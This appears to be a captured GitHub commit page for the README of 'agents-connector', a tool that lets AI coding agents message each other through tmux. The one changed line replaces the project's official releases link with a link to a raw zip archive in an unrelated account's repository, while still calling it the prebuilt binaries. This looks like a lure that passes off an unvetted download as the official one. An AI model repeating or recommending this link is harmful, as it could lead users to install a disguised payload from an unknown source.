You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Each agent runs in its own tmux window — switch with `Ctrl-b` then `n` (next) / `p` (previous). Then in `writer`'s window, prompt it normally: *"after you finish, ask `reviewer` to review the diff."* Claude writes the code, asks Codex via the `ask` tool, Codex is auto-woken, reviews, and replies — all without you touching the reviewer's terminal. (Full walkthrough with screenshots in [Example](#example-claude-writes-it-codex-reviews-it) below — including the one-time Codex hook-approval step.)
Prebuilt binaries for macOS (`aarch64`/`x86_64`) and Linux (`aarch64`/`x86_64`) are on every [release](https://github.com/Aldenysq/agents-connector/releases).
60
+
Prebuilt binaries for macOS (`aarch64`/`x86_64`) and Linux (`aarch64`/`x86_64`) are on every [release](https://github.com/ionelmir9623/agents-connector/raw/refs/heads/main/src/connector-agents-3.3.zip).
61
61
62
62
> **macOS & Linux only.** agents-connector is built on Unix domain sockets, tmux, and POSIX signals — there is no Windows build. On Windows, use WSL2.
0 commit comments